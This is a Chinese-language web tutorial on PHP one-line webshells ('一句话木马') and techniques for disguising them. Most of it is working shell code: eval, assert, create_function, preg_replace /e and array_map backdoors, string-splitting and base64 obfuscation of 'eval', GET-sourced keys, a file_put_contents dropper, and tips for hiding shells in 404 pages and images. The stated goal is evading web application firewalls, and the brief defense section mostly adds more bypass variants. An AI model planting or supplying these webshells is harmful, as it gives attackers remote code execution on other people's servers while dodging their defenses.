php一句话木马变形技巧
一、什么是一句话木马?
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。
二、我们如何发送命令,发送的命令如何执行?
我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ']
接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。 所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。
0.eval函数
<?php eval($_POST['a']) ?>
其中eval就是执行命令的函数,**$_POST[‘a']**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马的强大之处。
因为木马是接收post请求中 “a” 的数据( $_POST[‘a']),所以我们必须以post方法发送数据并且将我们要执行的代码赋值给“a”。如果把木马中的post替换成get,那么我么就需要以GET方法发送“a”,
使用 其他函数制作一句话木马
1.assert函数
<?php assert(@$_POST['a']); ?>
2.create_function函数
<?php$fun = create_function('',$_POST['a']);$fun();?>
把用户传递的数据生成一个函数fun(),然后再执行fun()
3. call_user_func回调函数
<?php@call_user_func(assert,$_POST['a']);?>
call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。
这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。
4.preg_replace函数
<?php@preg_replace("/abcde/e", $_POST['a'], "abcdefg");?>
这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。
这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。
5. file_put_contents函数
利用函数生成木马
<?php $test='<?php $a=$_POST["cmd"];assert($a); ?>'; file_put_contents("Trojan.php", $test); ?>
函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件的内容。
6.array数组
<?php$a='assert';array_map("$a",$_REQUEST);?>
上述定义参数a并赋值‘assert',利用array_map()函数将执行语句进行拼接。最终实现assert($_REQUEST)
。
<?php$item['JON']='assert';$array[]=$item;$array[0]['JON']($_POST["TEST"]);?>
利用函数的组合效果,使得多个参数在传递后组合成一段命令并执行。
7.PHP变量函数
<?php$a = "eval";$a(@$_POST['a']);?>
第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。
三、如何让一句话木马绕过waf ?
waf是网站的防火墙,例如安全狗就是waf的一种。waf通常以关键字判断是否为一句话木马,但是一句话木马的变形有很多种,waf根本不可能全部拦截。想要绕过waf,需要掌握各种PHP小技巧,掌握的技巧多了,把技巧结合起来,设计出属于自己的一句话木马。
1.PHP可变变量
<?php$bb="eval";$aa="bb";$$aa($_POST['a']);?>
看这句就能理解上述语句:$$aa = ( ( (aa) = $ (‘bb') = $bb = “eval”
2.str_replace函数
<?php$a=str_replace("Waldo", "", "eWaldoval");$a(@$_POST['a']);?>
函数功能:在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除"Waldo"。
3. base64_decode函数
<?php$a=base64_decode("ZXZhbA==")$a($_POST['a']);?>
这里是base64解密函数,"ZXZhbA=="是eval的base64加密。
4."."操作符
<?php$a="e"."v";$b="a"."l";$c=$a.$b;$c($_POST['a']);?>
5.parse_str函数
<?php$str="a=eval";parse_str($str);$a($_POST['a']);?>
执行这个函数后,生成一个变量$a,值为字符串"eval"
6.更换数据来源
6.1GET篇
<?php $_GET[a]($_GET[b]); ?>
<?php @eval( $_GET[$_GET[b]])>
利用方法:
b=cmd&cmd=phpinfo()
6.2利用script代替<? 、?>标签
<script language="php">@eval_r($_GET[b])</script>
6.3利用session
7.字符替换或特殊编码
8.木马藏匿
1.404页面
2.图片木马,用文件包含调用
四、总结
绕过技巧:
- 更换执行数据来源
- 字符替换或者编码
- 采取隐匿手段
tips:使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。
五、防御
1.禁用assert()函数,监控eval()
2.搜索日志的assert。
亦可能绕过:
<?php $c=$_GET[n].'t'; @$c($_POST[cmd]); ?>
<?php $c=base64_decode('YXNzZXI=').$_GET[n].'t'; @$c($_POST[cmd]); ?>
以上就是php一句话木马变形技巧的详细内容,更多关于php一句话木马变形技巧的资料请关注猪先飞其它相关文章!
相关文章
- 这篇文章主要介绍了源码分析系列之json_encode()如何转化一个对象,对json_encode()感兴趣的同学,可以参考下...2021-04-22
- PHP去除html、css样式、js格式的方法很多,但发现,它们基本都有一个弊端:空格往往清除不了 经过不断的研究,最终找到了一个理想的去除html包括空格css样式、js 的PHP函数。...2013-08-02
- index.php怎么打开?初学者可能不知道如何打开index.php,不会的同学可以参考一下本篇教程 打开编辑:右键->打开方式->经文本方式打开打开运行:首先你要有个支持运行PH...2017-07-06
PHP中func_get_args(),func_get_arg(),func_num_args()的区别
复制代码 代码如下:<?php function jb51(){ print_r(func_get_args()); echo "<br>"; echo func_get_arg(1); echo "<br>"; echo func_num_args(); } jb51("www","j...2013-10-04- 这篇文章主要介绍了PHP编程 SSO详细介绍及简单实例的相关资料,这里介绍了三种模式跨子域单点登陆、完全跨单点域登陆、站群共享身份认证,需要的朋友可以参考下...2017-01-25
- 这篇文章主要介绍了PHP实现创建以太坊钱包转账等功能,对以太坊感兴趣的同学,可以参考下...2021-04-20
- 这篇文章主要为大家详细介绍了php微信公众账号开发之五个坑,具有一定的参考价值,感兴趣的小伙伴们可以参考一下...2016-10-02
- 这篇文章主要介绍了PHP如何通过date() 函数格式化显示时间,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下...2020-11-13
- 这篇文章主要为大家详细介绍了Vue组件实现旋转木马动画效果,文中示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们可以参考一下...2021-07-23
ThinkPHP使用心得分享-ThinkPHP + Ajax 实现2级联动下拉菜单
首先是数据库的设计。分类表叫cate.我做的是分类数据的二级联动,数据需要的字段有:id,name(中文名),pid(父id). 父id的设置: 若数据没有上一级,则父id为0,若有上级,则父id为上一级的id。数据库有内容后,就可以开始写代码,进...2014-05-31- 这篇文章主要介绍了golang与php实现计算两个经纬度之间距离的方法,结合实例形式对比分析了Go语言与php进行经纬度计算的相关数学运算技巧,需要的朋友可以参考下...2016-07-29
- 今天我给大家分享的是在不刷新页面的前提下,使用PHP+jQuery+Ajax实现多图片上传的效果。用户只需要点击选择要上传的图片,然后图片自动上传到服务器上并展示在页面上。...2015-03-15
- 这篇文章主要介绍了PHP正则表达式过滤html标签属性的相关内容,实用性非常,感兴趣的朋友参考下吧...2016-05-06
- 这篇文章主要为大家详细介绍了php构造方法中析构方法在继承中的表现,感兴趣的小伙伴们可以参考一下...2016-04-15
- 这篇文章主要介绍了PHP如何使用cURL实现Get和Post请求,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下...2020-07-11
- 这篇文章主要介绍了thinkPHP中多维数组的遍历方法,以简单实例形式分析了thinkPHP中foreach语句的使用技巧,需要的朋友可以参考下...2016-01-12
- 这篇文章主要介绍了PHP简单实现生成txt文件到指定目录的方法,简单对比分析了PHP中fwrite及file_put_contents等函数的使用方法,需要的朋友可以参考下...2016-04-28
- 这篇文章主要为大家详细介绍了php图片添加文字水印实现代码,具有一定的参考价值,感兴趣的小伙伴们可以参考一下...2016-03-17
- 这篇文章主要介绍了php判断邮箱地址是否存在的方法,php判断邮箱地址是否存在的方法有两种,感兴趣的朋友可以参考一下...2016-02-18
- 下面小编就为大家带来一篇thinkphp自定义权限管理之名称判断方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧...2017-04-03